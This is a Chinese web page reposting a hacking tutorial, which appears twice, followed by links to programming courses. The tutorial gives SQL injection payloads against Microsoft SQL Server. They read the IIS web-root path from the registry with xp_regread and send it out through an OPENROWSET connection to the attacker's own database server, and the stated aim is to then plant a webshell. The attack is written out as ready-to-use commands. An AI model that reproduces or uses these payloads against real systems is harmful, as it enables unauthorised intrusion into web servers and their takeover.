渗透中用openrowset搞shell的方法
网络编程 2021-07-05 13:02www.168986.cn编程入门
渗透中用openrowset搞shell的方法
得到SQL注入点,想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
在自己机器建立SQL数据库
然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))--
在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a. FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''select FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
这样fenggou这个表里就会有这样一条记录select a. FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
不用说,''D:\WEB"就是从注册表里读出的物理路径拉.然后执行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--
等于执行了select a. FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
OK,这时你在你机器上SQL事件追踪器上就会显示select FROM pubs.dbo.authors where au_fname='D:\WEB,,1'
哇 哈哈哈哈哈 物理路径到手了 写小马传大马吧~
得到SQL注入点,想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
在自己机器建立SQL数据库
然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))--
在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a. FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''select FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
这样fenggou这个表里就会有这样一条记录select a. FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
不用说,''D:\WEB"就是从注册表里读出的物理路径拉.然后执行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--
等于执行了select a. FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
OK,这时你在你机器上SQL事件追踪器上就会显示select FROM pubs.dbo.authors where au_fname='D:\WEB,,1'
哇 哈哈哈哈哈 物理路径到手了 写小马传大马吧~
编程语言
- 如何快速学会编程 如何快速学会ug编程
- 免费学编程的app 推荐12个免费学编程的好网站
- 电脑怎么编程:电脑怎么编程网咯游戏菜单图标
- 如何写代码新手教学 如何写代码新手教学手机
- 基础编程入门教程视频 基础编程入门教程视频华
- 编程演示:编程演示浦丰投针过程
- 乐高编程加盟 乐高积木编程加盟
- 跟我学plc编程 plc编程自学入门视频教程
- ug编程成航林总 ug编程实战视频
- 孩子学编程的好处和坏处
- 初学者学编程该从哪里开始 新手学编程从哪里入
- 慢走丝编程 慢走丝编程难学吗
- 国内十强少儿编程机构 中国少儿编程机构十强有
- 成人计算机速成培训班 成人计算机速成培训班办
- 孩子学编程网上课程哪家好 儿童学编程比较好的
- 代码编程教学入门软件 代码编程教程